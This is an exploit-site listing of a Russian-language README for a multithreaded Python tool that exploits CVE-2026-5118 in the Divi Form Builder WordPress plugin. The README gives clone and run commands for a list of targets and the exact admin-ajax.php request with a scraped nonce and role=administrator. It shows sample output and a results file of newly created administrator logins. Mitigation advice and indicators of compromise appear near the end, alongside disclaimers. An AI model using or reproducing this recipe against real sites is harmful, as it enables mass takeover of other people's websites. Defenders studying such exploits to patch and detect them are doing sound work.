Sploitus

Exploit for CVE-2026-5118

kitploit · 2026-08-25

Exploit Code

MARKDOWN160 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JENDERAL92-CVE-2026-5118
# Divi Form Builder <= 5.1.2 - Неаутентифицированное повышение привилегий через 'role'

> **⚠️ ПРЕДУПРЕЖДЕНИЕ: Этот инструмент предназначен только для авторизованного тестирования на проникновение и исследований безопасности.**  
>  Несанкционированный доступ к компьютерным системам незаконен. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Более подробное заявление об отказе от ответственности можно увидеть в репозитории Jenderal92. Вы можете проверить его ЗДЕСЬ !!!

## Обзор

Этот скрипт на Python 2 эксплуатирует уязвимость повышения привилегий в **плагине Divi WordPress** (и связанных формах Divi). Он позволяет удаленно зарегистрировать учетную запись **администратора** путем:

  * Извлечения `fb_nonce` из формы регистрации Divi на цели.
  * Отправки сформированного multipart запроса на `/wp-admin/admin-ajax.php` с `role=administrator`.
  * Автоматического обнаружения успеха и сохранения скомпрометированных URL администраторов.



## Возможности

  * ✅ **Многопоточность** (по умолчанию 20 потоков) для быстрого сканирования.
  * ✅ **Автоматическая нормализация URL** – добавляет `https://`, если отсутствует.
  * ✅ **Извлечение nonce** с использованием нескольких шаблонов regex (встроенный JavaScript, скрытые поля, `de_fb_obj`).
  * ✅ **Запрос multipart/form-data** , имитирующий легитимную отправку браузера.
  * ✅ **Обнаружение успеха** по ключевым словам в ответе (`success`, `user_id`, `user created` и т.д.).
  * ✅ **Результаты сохраняются** в `results.txt` в формате:  
`https://target.com/wp-admin/ | username | password`



## Требования

  * **Python 2.7** (использует `urllib2`, `Queue`, `threading` – несовместим с Python 3 без изменений)
  * Список целевых URL (по одному на строку)



## Установка

root@kitploit:~
    
    
    git clone https://github.com/Jenderal92/CVE-2026-5118.git
    cd CVE-2026-5118
    chmod +x CVE-2026-5118.py
    

## Использование

### 1\. Подготовка списка целей

Создайте текстовый файл с одним доменом или URL на строку. Вы можете опустить `http://` / `https://` – скрипт добавит `https://` по умолчанию.

**Пример`targets.txt`:**

root@kitploit:~
    
    
    example.com
    https://vulnerable-site.com
    http://127.0.0.1/wordpress
    test-site.org
    

### 2\. Запуск эксплойта

root@kitploit:~
    
    
    python CVE-2026-5118.py targets.txt
    

### 3\. Пример вывода

root@kitploit:~
    
    
    [*] Total targets : 4
    [*] Credentials   : Attacker / Attacker@123#+
    [*] Threads       : 20
    [*] Output file   : results.txt
    
    [1] Checking https://example.com
    [+] SUCCESS! https://example.com/wp-admin/
    
    [2] Checking https://vulnerable-site.com
    [+] SUCCESS! https://vulnerable-site.com/wp-admin/
    
    [3] Checking http://192.168.1.100/wordpress
    [3] FAILED  http://192.168.1.100/wordpress
    
    [4] Checking https://test-site.org
    [4] FAILED  https://test-site.org
    
    === DONE ===
    Successful: 2 / 4
    

### 4\. Файл результатов (`results.txt`)

root@kitploit:~
    
    
    https://example.com/wp-admin/|Attacker|Attacker@123#+
    https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
    

## Конфигурация

Вы можете настроить следующие переменные в начале скрипта:

## Как это работает

  1. **Нормализация URL** – добавляет `https://`, если схема не указана.
  2. **Извлечение nonce** – загружает главную страницу (или страницу регистрации) и ищет `fb_nonce` с помощью шаблонов regex.
  3. **Формирование запроса** – создает POST запрос `multipart/form-data`, содержащий: 
     * `action=de_fb_ajax_submit_ajax_handler`
     * `fb_nonce=<extracted nonce>`
     * `role=administrator`
     * `de_fb_user_login` / `user_login`
     * `de_fb_user_pass` / `user_pass`
     * `de_fb_user_email` / `user_email`
  4. **Отправка на admin‑ajax.php** – если ответ содержит ключевые слова успеха, цель помечается как уязвимая.



## Обнаружение и смягчение

**Для администраторов WordPress, использующих Divi:**

  * Обновите Divi и все связанные плагины до последней версии.
  * Отключите публичную регистрацию, если она не нужна.
  * Используйте плагин безопасности (Wordfence, Sucuri) для мониторинга запросов к `admin-ajax.php`.
  * Внедрите reCAPTCHA на всех формах регистрации.
  * Никогда не выставляйте формы регистрации с параметром `role`, которым можно манипулировать.



**Индикаторы компрометации (IOCs):**

  * Неожиданные запросы к `admin-ajax.php` с `action=de_fb_ajax_submit_ajax_handler`
  * Новые пользователи-администраторы с подозрительными именами (например, `Attacker`)
  * Данные POST, содержащие `role=administrator`, в журналах доступа



## Юридическое заявление об отказе от ответственности

Это программное обеспечение предоставляется только для **образовательных целей** и **авторизованного тестирования безопасности**. Автор не несет ответственности за неправомерное использование или ущерб, причиненный этим инструментом. Используя это программное обеспечение, вы соглашаетесь:

  * Получить **письменное разрешение** от владельца системы перед тестированием.
  * Соблюдать все применимые законы (CFAA, Computer Misuse Act, UU ITE и т.д.).
  * Немедленно удалить любой несанкционированный доступ, полученный.
  * Ответственно сообщать об уязвимостях затронутому поставщику.



**Нарушение этих условий может привести к уголовному преследованию, штрафам или тюремному заключению.**

## Вклад

Принимаются запросы на включение изменений для улучшений (портирование на Python 3, лучшее извлечение nonce, обнаружение дополнительных путей регистрации). Пожалуйста, сохраняйте этическое заявление об отказе от ответственности.